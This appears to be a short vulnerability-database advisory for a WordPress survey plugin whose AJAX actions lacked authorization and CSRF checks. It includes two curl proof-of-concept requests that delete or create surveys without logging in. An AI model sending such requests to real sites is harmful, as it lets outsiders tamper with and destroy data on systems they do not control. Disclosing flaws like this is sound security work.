The plugin AJAX calls (including unauthenticated ones) did not have capabilities and CSRF checks, allowing unauthenticated users to update, delete or create arbitrary surveys.
curl --url https://exmple.com/wp-admin/admin-ajax.php --data "action=ajax_survey&sspcmd=delete&survey_id=110251535" curl --url https://example.com/wp-admin/admin-ajax.php --data 'action=ajax_survey&sspcmd=add&survey_id=1337&survey_name=test'
Pagely
John Castro
No
2021-01-08 (about 2 years ago)
2021-01-08 (about 2 years ago)
2021-01-10 (about 2 years ago)